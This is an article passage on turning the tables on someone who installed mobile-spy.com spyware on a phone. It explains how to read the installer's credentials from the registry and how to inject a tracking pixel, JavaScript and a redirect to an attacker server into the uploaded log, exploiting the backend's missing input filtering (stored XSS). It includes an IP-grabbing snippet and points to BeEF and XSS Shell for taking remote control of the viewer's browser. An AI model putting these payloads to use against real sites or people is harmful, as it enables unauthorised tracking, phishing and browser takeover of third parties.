Home > Articles > Home & Office Computing > Entertainment/Gaming/Gadgets

  • Print
  • + Share This

Unveiling the Untrusting

There is nothing more annoying than finding out that your personal information is being stolen. While we don't condone revenge, it might be necessary to find out who is spying on you and why they feel the need to invade your personal space. As we mentioned before, only the owner of the phone can legally install this software on the device. So, if you are the owner and the existence of the software is a surprise, the following tips will help you catch the criminal.

The first thing you will want to do is extract the username and password from the registry of your device. This can be done with any number of tools, one of which is Airscanner's Power tools suite (Pocket PC Phone only). As Figure 3 illustrates, accessing the username/password of the person who installed the software is very easy.

Figure 3

Figure 3 Viewing the username/password with Airscanner RegEdit

Hopefully, the username provides you with enough information on who installed the software. If not, it is time to take the reverse-spying to the next level with a little log fudging.

Since the log file is on your device in the \Program Files\smartphone\ directory, it is very easy for you to view and alter the contents. By combining this power with the fact that mobile-spy.com does not filter the incoming log content for any HTML/JavaScript tags, you can essentially turn the log file into your very own spyware. The following lists the steps you can take to expose your attacker:

  1. Setup a web server on which you can store files and collect web logs.
  2. Insert the following into you smartphone.log file.

    2007-10-02	13:50:47	google.com

  3. Place a single pixel image file at http://server.com/img.jpg.
  4. Let the phone upload the updated log contents to the mobile-spy.com backend.
  5. Monitor your logs and see what IP address the request for the image comes from.

Other options include injecting JavaScript into the log file, which will then be executed when your attacker views the log file. Simply add the following into the log file to execute a JavaScript file on your server.

2007-10-02	13:50:47	site.com

Inside the JavaScript file you can add all sorts of scripts that can expose the attacker. With this kind of power, you can easily grab their internal IP address:

var w = window.location;
  var host = w.host;
  var port = w.port || 80;
  var Socket = (new java.net.Socket(host,port)).getLocalAddress().getHostAddress();

Or instantly redirect them to a "Survey site" from which you can collect information about what they think about mobile-spy.com software. If you promise a prize, chances are you can at least get their email address.

location.href='http://server.com/survey.html';

Once you have the power to inject HTML or JavaScript directly into the attacker's browser, you can collect all kinds of information about them such as their browser history, their external and internal IP address, details about the computer they are using, and more. In addition to this, you can install a backdoor of your own via programs like AttackAPI, BeEF, or XSS Shell. With one of these installed on the attacker's browser, you can remotely control their computer and either collect information or create havoc.

  • + Share This
  • 🔖 Save To Your Account

Related Resources

There are currently no related titles. Please check back later.